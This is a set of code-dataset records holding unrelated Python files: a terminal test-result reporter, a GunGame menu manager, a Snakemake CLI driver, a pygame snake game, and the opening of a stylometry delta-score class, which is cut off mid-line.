code\n\n def format_counts(self, terse=False):\n parts = []\n char_count = 0\n total_name = \"T\" if terse else \"Tests\"\n char_count += len(\"%i %s\" % (self.total, total_name))\n parts.append(\"%s %s\" % (C.bold(str(self.total)), total_name))\n for name, count in self.counts.items():\n if count == 0:\n continue\n terse_desc, singular, plural, color = self.DESCRIPTIONS[name]\n if terse:\n desc = terse_desc\n elif count == 1:\n desc = singular\n else:\n desc = plural\n char_count += len(\", %i %s\" % (count, desc))\n parts.append(\", \" + color(\"%i %s\" % (count, desc)))\n char_count += 1\n return \"%s.\" % \"\".join(parts), char_count\n\n def update(self):\n data = [self._ansii_encode(\"0G\")]\n columns, rows = terminal_size()\n column = 0\n\n runners, runner_len = self._runners()\n data += runners\n data.append(\" \")\n column += runner_len + 1\n\n counts, count_len = self.format_counts()\n if column + count_len > columns:\n counts, count_len = self.format_counts(terse=True)\n data.append(counts)\n column += count_len\n\n data.append(self._ansii_encode(\"K\"))\n self.stream.write(\"\".join(data))\n self.stream.flush()\n\n def output(self, data, *more):\n self.stream.write(self._ansii_encode(\"0G\") + self._ansii_encode(\"K\"))\n for part in itertools.chain(data, more):\n self.stream.write(\"%s\\n\" % str(part))\n\n def report_result(self, bus, test, result, *data):\n assert result in self.ALLOWED_RESULTS, (\n \"%r test result not understood\" % (result, ))\n if self.ignore_result(test, result):\n return\n self.counts[result] += 1\n if len(data) > 0:\n self.output(data)\n self.update()\n\n def report_start(self, bus, test):\n if self.first_output is None:\n self.first_output = time.time()\n self.running.append(type(test))\n self.update()\n\n def report_stop(self, bus, test):\n self.running.remove(type(test))\n self.last_output = time.time()\n self.update()\n\n def report_test(self, bus, test):\n if not self.ignore_result(test):\n self.total += 1\n self.update()\n\n def report_totals(self, bus):\n message = \"Ran %s tests in %s seconds\" % (\n C.bold(str(self.total)), C.bold(\n \"%.2f\" % (self.last_output - self.first_output)))\n self.stream.write(\"\\n%s\\n\" % message)\n", "sub_path": "subtest/src/subtest/results/epic.py", "file_name": "epic.py", "file_ext": "py", "file_size_in_byte": 5118, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "subtest.color.color", "line_number": 19, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 19, "usage_type": "name"}, {"api_name": "struct.unpack", "line_number": 27, "usage_type": "call"}, {"api_name": "fcntl.ioctl", "line_number": 28, "usage_type": "call"}, {"api_name": "termios.TIOCGWINSZ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.open", "line_number": 38, "usage_type": "call"}, {"api_name": "os.ctermid", "line_number": 38, "usage_type": "call"}, {"api_name": "os.O_RDONLY", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.close", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 45, "usage_type": "attribute"}, {"api_name": "subtest.color.result", "line_number": 51, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 51, "usage_type": "name"}, {"api_name": "subtest.color.handlers", "line_number": 63, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 63, "usage_type": "name"}, {"api_name": "subtest.color.handlers", "line_number": 64, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 64, "usage_type": "name"}, {"api_name": "subtest.color.handlers", "line_number": 77, "usage_type": "attribute"}, {"api_name": "subtest.color", "line_number": 77, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 135, "usage_type": "call"}, {"api_name": "time.time", "line_number": 150, "usage_type": "call"}, {"api_name": "time.time", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "89205691", "text": "# ../core/menus/__init__.py\r\n\r\n'''\r\n$Rev$\r\n$LastChangedBy$\r\n$LastChangedDate$\r\n'''\r\n\r\n# =============================================================================\r\n# >> IMPORTS\r\n# =============================================================================\r\n# Python Imports\r\n# Path\r\nfrom path import path\r\n\r\n# Eventscripts Imports\r\n# ES\r\nfrom es import dbgmsg\r\n# Playerlib\r\nfrom playerlib import getUseridList\r\n# Popuplib\r\nfrom popuplib import Popup_popup\r\n\r\n# GunGame Imports\r\n# Messaging\r\nfrom gungame51.core.messaging.shortcuts import langstring\r\n\r\n\r\n# =============================================================================\r\n# >> GLOBAL VARIABLES\r\n# =============================================================================\r\n_menu_folder = path(__file__).parent\r\n\r\n\r\n# =============================================================================\r\n# >> CLASSES\r\n# =============================================================================\r\nclass MenuManager(object):\r\n '''\r\n Class for managing menus\r\n '''\r\n def __new__(cls, *p, **k):\r\n if not '_gg_menus' in cls.__dict__:\r\n cls._gg_menus = object.__new__(cls)\r\n cls._gg_menus.__loaded__ = {}\r\n\r\n return cls._gg_menus\r\n\r\n def load_menus(self):\r\n dbgmsg(0, langstring('Load_Commands'))\r\n for file_path in _menu_folder.files('*_menu.py'):\r\n self._load(file_path)\r\n\r\n def _load(self, file_path):\r\n name = file_path.namebase\r\n if name in self.__loaded__:\r\n raise NameError('GunGame menu \"%s\" is already loaded' % name)\r\n\r\n if not file_path.isfile():\r\n raise NameError('\"%s\" is not a valid menu name.' % name)\r\n\r\n menuInstance = self.get_menu_by_name(name)\r\n self.__loaded__[name] = menuInstance\r\n self.call_block(menuInstance, 'load')\r\n\r\n def unload_menus(self):\r\n for name in self.__loaded__.keys():\r\n self._unload(name)\r\n\r\n def _unload(self, name):\r\n menu_instance = self.get_menu_by_name(name)\r\n self.call_block(menu_instance, 'unload')\r\n del self.__loaded__[name]\r\n\r\n def send(self, name, filter_type):\r\n if name not in self.__loaded__:\r\n raise NameError('\"%s\" is not a loaded menu name.' % name)\r\n\r\n elif str(filter_type).isdigit():\r\n menu_instance = self.get_menu_by_name(name)\r\n self.call_block(menu_instance, 'send_menu', filter_type)\r\n\r\n elif str(filter_type).startswith('#'):\r\n for userid in getUseridList(filter_type):\r\n self.send(name, userid)\r\n\r\n else:\r\n raise ValueError('\"%s\" is not a value filter/userid' % filter_type)\r\n\r\n def get_menu_by_name(self, name):\r\n '''\r\n Returns the module of an addon by name\r\n '''\r\n # If the menu is loaded we have stored the module\r\n if name in self.__loaded__:\r\n return self.__loaded__[name]\r\n\r\n # If the menu is not loaded we need to import it\r\n loadedMenu = __import__(('gungame51.core.menus.%s' % name),\r\n globals(), locals(), [''])\r\n\r\n # We have to reload the module to re-instantiate the globals\r\n reload(loadedMenu)\r\n return loadedMenu\r\n\r\n def call_block(self, menu_instance, blockname, *a, **kw):\r\n \"\"\" Calls a block in a loaded sub-addon \"\"\"\r\n menu_globals = menu_instance.__dict__\r\n if blockname in menu_globals and callable(menu_globals[blockname]):\r\n menu_globals[blockname](*a, **kw)\r\n\r\n\r\nclass OrderedMenu(object):\r\n '''\r\n Creates an ordered menu with continuous numbering throughout pages.\r\n This class only creates single page popups, for the page the player has\r\n requested. This way, it only makes a popup for requested pages. It stores\r\n all of the data for the menu in the list \"items\".\r\n\r\n Note: highlightIndex will highlight the item at it's number in the menu.\r\n Menu numbering starts at 1.\r\n '''\r\n def __init__(self, userid, title, items=[], options=10,\r\n highlightIndex=None):\r\n self.userid = userid\r\n self.title = title\r\n self.items = items\r\n self.options = options\r\n self.highlightIndex = highlightIndex\r\n self.totalPages = (\r\n (len(items) / options) + (1 if len(items) % options > 0 else 0))\r\n\r\n def send_page(self, page):\r\n # If a page less than 1 is requested, send page 1\r\n if page < 1:\r\n page = 1\r\n # If a page more than the total number of pages is requested, send the\r\n # last page\r\n elif page > self.totalPages:\r\n page = self.totalPages\r\n\r\n # Create a popup\r\n popup = Popup_popup(\"OrderedMenu_p%s\" % page)\r\n # Get the index of the first item on the current page\r\n startIndex = (page - 1) * self.options\r\n # Add the title\r\n popup.addline(\"%s%s(%s/%s)\" % (self.title, \" \" * 5, page,\r\n self.totalPages))\r\n popup.addline(\"-----------------------------\")\r\n\r\n # Add all of the options\r\n for index in xrange(startIndex, startIndex + self.options):\r\n # If it is the last page, and we are out of data, add empty lines\r\n if index >= len(self.items):\r\n popup.addline(\" \")\r\n continue\r\n\r\n # If the current index is the highlightIndex, add -> in front\r\n highlight = \"->\" if index + 1 == self.highlightIndex else \"\"\r\n # Add the line to the popup\r\n popup.addline(\"%s%s. %s\" % (highlight, index + 1,\r\n self.items[index]))\r\n\r\n popup.addline(\"-----------------------------\")\r\n\r\n # Add the back and next buttons based on page number\r\n if page > 1:\r\n popup.addline(\"->8. Back\")\r\n else:\r\n popup.addline(\" \")\r\n\r\n if page < self.totalPages:\r\n popup.addline(\"->9. Next\")\r\n else:\r\n popup.addline(\" \")\r\n\r\n # Finish setting up the popup\r\n popup.addline(\"0. Exit\")\r\n # Have self.menuselect fire when the player makes a selection\r\n popup.menuselect = self.menuselect\r\n\r\n popup.timeout('view', 30)\r\n popup.timeout('send', 30)\r\n\r\n # Send the page\r\n popup.send(self.userid)\r\n\r\n def menuselect(self, userid, choice, popupName):\r\n # Get the page number from the popup name\r\n currentPage = int(popupName.replace(\"OrderedMenu_p\", \"\"))\r\n\r\n # Close the menu\r\n if choice == 10:\r\n return\r\n # Decrement the page number\r\n elif choice == 8:\r\n newPage = currentPage - 1\r\n self.send_page(newPage)\r\n # Increment the page number\r\n elif choice == 9:\r\n newPage = currentPage + 1\r\n self.send_page(newPage)\r\n # Resend the page\r\n else:\r\n self.send_page(currentPage)\r\n", "sub_path": "cstrike/addons/eventscripts/gungame51/core/menus/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 7099, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "path.path", "line_number": 32, "usage_type": "call"}, {"api_name": "es.dbgmsg", "line_number": 50, "usage_type": "call"}, {"api_name": "gungame51.core.messaging.shortcuts.langstring", "line_number": 50, "usage_type": "call"}, {"api_name": "playerlib.getUseridList", "line_number": 84, "usage_type": "call"}, {"api_name": "popuplib.Popup_popup", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "510047692", "text": "\"\"\"\nCommand line interface driver for snakemake workflows\n\"\"\"\nimport argparse\nimport os.path\nimport snakemake\nimport sys\nimport yaml\nimport time\nimport shutil\nimport errno\n\n# read from __init__.py\nfrom . import __program__\nfrom . import __version__\nfrom . import __email__\nfrom . import __date__\nfrom . import __author__\n\n# global vars\nthisdir = os.path.abspath(os.path.dirname(__file__))\nparentdir = os.path.join(thisdir, \"..\")\ncwd = os.getcwd()\n\n# non-standard lib: For color handling on the shell\ntry:\n from colorama import init, Fore\n\n # INIT color\n # Initialise colours for multi-platform support.\n init()\n reset = Fore.RESET\n colors = {\n \"success\": Fore.GREEN,\n \"error\": Fore.RED,\n \"warning\": Fore.YELLOW,\n \"info\": \"\",\n }\nexcept ImportError:\n sys.stderr.write(\n \"colorama lib desirable. \" + 'Install with \"conda install colorama\".\\n\\n'\n )\n reset = \"\"\n colors = {\"success\": \"\", \"error\": \"\", \"warning\": \"\", \"info\": \"\"}\n\n\ndef alert(atype, text, log, repeat=False, flush=False):\n if repeat:\n textout = \"{} [{}] {}\\r\".format(\n time.strftime(\"%Y%m%d-%H:%M:%S\"), atype.rjust(7), text\n )\n else:\n textout = \"{} [{}] {}\\n\".format(\n time.strftime(\"%Y%m%d-%H:%M:%S\"), atype.rjust(7), text\n )\n\n log.write(\"{}{}{}\".format(colors[atype], textout, reset))\n if flush:\n log.flush()\n if atype == \"error\":\n sys.exit(1)\n\n\ndef success(text, log=sys.stderr, flush=True):\n alert(\"success\", text, log, flush=flush)\n\n\ndef error(text, log=sys.stderr, flush=True):\n alert(\"error\", text, log, flush=flush)\n\n\ndef warning(text, log=sys.stderr, flush=True):\n alert(\"warning\", text, log, flush=flush)\n\n\ndef info(text, log=sys.stderr, repeat=False, flush=True):\n alert(\"info\", text, log, repeat=repeat, flush=flush)\n\n\ndef print_logo():\n try:\n from pyfiglet import figlet_format\n\n text = figlet_format(__program__, font=\"slant\")\n except ImportError:\n text = \"\\n\\t\\t{}\\n\\n\".format(__program__)\n sys.stdout.write(\"{}\\n\".format(\"*\" * 60))\n sys.stdout.write(text)\n sys.stdout.write(\"version: {} date: {}\\n\".format(__version__, __date__))\n sys.stdout.write(\"Using executable at: {}\\n\".format(thisdir))\n sys.stdout.write(\"{}\\n\\n\".format(\"*\" * 60))\n\n\ndef parse_cmdline():\n description = \"An Snakemake command line interface for metafunc.\"\n version = \"version {}, date {}\".format(__version__, __date__)\n epilog = \"Copyright {} ({})\".format(__author__, __email__)\n\n parser = argparse.ArgumentParser(\n prog=__program__, description=description, epilog=epilog,\n )\n\n parser.add_argument(\"--version\", action=\"version\", version=\"{}\".format(version))\n\n subparsers = parser.add_subparsers(dest=\"subparser_name\")\n\n p_config = subparsers.add_parser(\"help\", description=\"Print help.\",)\n p_config = subparsers.add_parser(\n \"setup\",\n description=\"Generate a directory with example files \"\n + \"for a metafunc run.\",\n )\n p_config.add_argument(\n \"-n\",\n \"--name\",\n dest=\"directoryname\",\n default=\"example\",\n help='Directory name (not full path). [default: \"example\"]',\n )\n\n p_run = subparsers.add_parser(\n \"run\", description=\"Run metafunc analysis.\"\n )\n p_run.add_argument(\n \"configfile\",\n metavar=\"CONFIG-FILE\",\n help='Config-file. Generate example with \"metafunc setup\"',\n )\n p_run.add_argument(\"-n\", \"--dry-run\", action=\"store_true\")\n p_run.add_argument(\"-f\", \"--force\", action=\"store_true\")\n\n # if no arguments supplied print help\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n return args, parser\n\n\ndef copyanything(src, dst):\n try:\n shutil.copytree(src, dst)\n except OSError as exc: # python >2.5\n if exc.errno == errno.ENOTDIR:\n shutil.copy(src, dst)\n else:\n raise\n\n\ndef main(sysargs=sys.argv[1:]):\n print_logo()\n args, parser = parse_cmdline()\n\n if args.subparser_name == \"help\":\n parser.print_help()\n desc = \"\"\"\nDescription\n-----------\n\nRun `metafunc setup` to generate an example directory with\nresources to make a metafunc run.\n\nEnter the directory and edit the config.yaml file to your\nproject requirements.\n\nRun `metafunc run config.yaml` from within the created\ndirectory.\n\"\"\"\n\n sys.stdout.write(desc)\n sys.exit(0)\n\n elif args.subparser_name == \"setup\":\n dest = os.path.join(cwd, args.directoryname)\n sys.stdout.write(f\"{__program__} setup:\\n\")\n sys.stdout.write(\n \"\\tExecution time: {}\\n\".format(time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n )\n sys.stdout.write(f\"\\tDestination: {dest}\\n\")\n sys.stdout.write(\"{}\\n\".format(\"*\" * 60))\n # test if already there\n if os.path.exists(dest):\n error(f'Destination example directory at \"{dest}\" already exists. EXIT.')\n\n src = os.path.join(thisdir, \"example\") \n copyanything(src, dest)\n success(\n f\"Example directory for a metafunc \"\n + f'run created at: \"{dest}\".'\n )\n return 0\n elif args.subparser_name == \"run\":\n # first, find the Snakefile\n snakefile_this = os.path.join(thisdir, \"Snakefile\")\n snakefile_parent = os.path.join(parentdir, \"Snakefile\")\n if os.path.exists(snakefile_this):\n snakefile = snakefile_this\n elif os.path.exists(snakefile_parent):\n snakefile = snakefile_parent\n else:\n msg = \"Error: cannot find Snakefile at any of the following locations:\\n\"\n msg += \"{}\\n\".format(snakefile_this)\n msg += \"{}\\n\".format(snakefile_parent)\n error(msg)\n\n # next, find the workflow params file\n if not os.path.exists(args.configfile):\n error(f\"Error: cannot find configfile {args.configfile}\\n. EXIT.\")\n\n sys.stdout.write(f\"{__program__} run:\\n\")\n sys.stdout.write(\n \"\\tExecution time: {}\\n\".format(time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n )\n sys.stdout.write(f\"\\tSnakefile: {snakefile}\\n\")\n sys.stdout.write(f\"\\tConfig-file: {os.path.abspath(args.configfile)}\\n\")\n sys.stdout.write(\"{}\\n\".format(\"*\" * 60))\n\n config = yaml.safe_load(open(args.configfile))\n\n # run snakemake\n status = snakemake.snakemake(\n snakefile,\n configfiles=[args.configfile],\n printshellcmds=True,\n dryrun=args.dry_run,\n forceall=args.force,\n use_singularity=config[\"use_singularity\"],\n singularity_args=config[\"singularity_args\"],\n use_conda=config[\"use_conda\"],\n cores=config[\"cores\"],\n # config=config,\n )\n\n if status: # translate \"success\" into shell exit code of 0\n success(f\"Run finished successfully.\")\n return 0\n return 1\n else:\n error(\"Mode not recognized. EXIT\")\n return 1\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "metafunc/command.py", "file_name": "command.py", "file_ext": "py", "file_size_in_byte": 7112, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "os.path.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.getcwd", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "name"}, {"api_name": "colorama.init", "line_number": 31, "usage_type": "call"}, {"api_name": "colorama.Fore.RESET", "line_number": 32, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 32, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 34, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 34, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 35, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 35, "usage_type": "name"}, {"api_name": "colorama.Fore.YELLOW", "line_number": 36, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 36, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 40, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 50, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 72, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pyfiglet.figlet_format", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 87, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 88, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 88, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 90, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 90, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 91, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 91, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 99, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 133, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 135, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 143, "usage_type": "call"}, {"api_name": "errno.ENOTDIR", "line_number": 145, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 146, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 151, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 171, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 171, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 175, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 175, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 176, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 176, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 177, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 177, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 178, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 180, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 181, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.path.path.exists", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 183, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 186, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 195, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 196, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 197, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 199, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 208, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 211, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 211, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 212, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 212, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 213, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 215, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 215, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 216, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.path.abspath", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 216, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 217, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 217, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 219, "usage_type": "call"}, {"api_name": "snakemake.snakemake", "line_number": 222, "usage_type": "call"}]} +{"seq_id": "6772342", "text": "# -*- coding: utf-8 -*-\n\nimport pygame\nimport random\nSCALE = 20 #地图中有多少个格子\nSIZE = 20#每一格的大小\nWIDTH = SCALE * SIZE\nHEIGHT = SCALE * SIZE\nDIRECT = [[0,-1],[-1,0],[0,1],[1,0]]\ndirt = 1#蛇前进的方向\nsnake = [[4,3],[5,3],[6,3]]\napple = [3,1]\n\ndef snake_update():\n global dirt\n new_body = [0,0]\n new_body[0] = (snake[0][0] + DIRECT[dirt][0]) % SCALE\n new_body[1] = (snake[0][1] + DIRECT[dirt][1]) % SCALE\n if new_body == apple:\n snake.insert(0, new_body)\n return True\n else:\n snake.insert(0, new_body)\n snake.pop()\n return False\ndef apple_update():\n apple[0] = random.randint(0,19)\n apple[1] = random.randint(0,19)\ndef is_lose(screen):\n if snake.count(snake[0]) >= 2:\n return True\n return False\ndef show_second(screen):\n screen.fill([255,255,255])\n font = pygame.font.Font(None, 100)\n text = font.render(\"LOSE\", True, [255,0,0])\n screen.blit(text, [0,100])\n img = pygame.image.load(\"snake.jpg\")\n screen.blit(img, [0, 0])\n pygame.time.delay(100)\ndef show(screen):\n screen.fill([255,255,255])\n for body in snake:\n pygame.draw.rect(screen,[0,255,0], [body[0]*SIZE,body[1]*SIZE, SIZE - 1, SIZE - 1])\n pygame.draw.circle(screen,[255,0,0], [apple[0]*SIZE + SIZE / 2,apple[1]*SIZE + SIZE / 2], SIZE/2)\n pygame.display.flip()\ndef w_down_cb():\n global dirt\n if dirt % 2 !=0:\n dirt = 0\ndef s_down_cb():\n global dirt\n if dirt % 2 !=0:\n dirt = 2\ndef a_down_cb():\n global dirt\n if dirt % 2 !=1:\n dirt = 1\ndef d_down_cb():\n global dirt\n if dirt % 2 !=1:\n dirt = 3\ndef main():\n pygame.init()\n screen = pygame.display.set_mode([WIDTH,HEIGHT])\n running = True\n while running:\n pygame.time.delay(200)#50毫秒延chi\n if snake_update():\n apple_update()\n\n if is_lose(screen):\n show_second(screen)\n pygame.time.delay(1000)\n\n break\n show(screen)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_w:\n w_down_cb()#call back\n elif event.key == pygame.K_s:\n s_down_cb()\n elif event.key == pygame.K_a:\n a_down_cb()\n elif event.key == pygame.K_d:\n d_down_cb()\n show_second(screen)\n pygame.time.delay(1000)\n pygame.quit()\nif __name__ == '__main__':\n main()\n", "sub_path": "A16042-forgiven-作业/homework2/snake.py", "file_name": "snake.py", "file_ext": "py", "file_size_in_byte": 2599, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.font.Font", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "104542507", "text": "import nltk\nimport logging\nimport string\nfrom statistics import mean, stdev, StatisticsError\nfrom nltk import word_tokenize\nfrom collections import Counter\n\nclass Database:\n \"\"\"A database contains authors of texts.\"\"\"\n \n def __init__(self,considered_words=0,real_words=False):\n \"\"\"\n Initialize a database. \n \n Keyword arguments:\n considered_words -- Specifies how many of the most common words\n are used for calculating the delta scores.\n If 0 then all are used.\n (default 0)\n real_words -- Specifies if only real words (i.e. alphabetic words)\n should be used for the algorithm. If False then also\n words like '.', ';' etc. are considered.\n (default False)\n \"\"\"\n \n # The following list contains all authors\n # of the database.\n self.authors = []\n \n # The following counter object contains all\n # words of the database and their respective\n # number of occurrences.\n self.counter = Counter() \n\n # The following two dictionaries contain the \n # mean frequencies and standard deviations of\n # the words in the database respectively.\n # This is with respect to the set of all texts\n # in the database.\n self.mean = {} \n self.stdev = {}\n\n self.txt_number = 0 # the number of texts in the database\n \n # The following variable states the number of\n # words to be considered for the algorithm. \n # For example: a value of 30 indicates that \n # we consider the 30 most common words for \n # our calculations.\n # A value of 0 indicates that we do not limit\n # the words used for the calculations.\n self.considered_words = considered_words\n \n # The following boolean value decides if the\n # algorithm considers only real words (like \n # 'the', 'go', 'dog' etc.) or if the algorithm\n # should consider all words (this includes \n # also interpunctuation).\n self.real_words = real_words \n \n def add_author(self,*authors):\n \"\"\"Add an authors to the database.\"\"\"\n for author in authors:\n self.authors.append(author)\n \n def calc_counter(self):\n \"\"\"\n Count the occurrences of every word in the database\n and how many texts there are.\n \"\"\"\n logging.info(\"Database: Counting.\")\n for author in self.authors:\n author.calc_counter()\n self.counter += author.counter\n self.txt_number += author.txt_number\n \n # Restrict the words to those who contain only *real* words\n if self.real_words is True: \n # The key k is a tuple of the form (word, 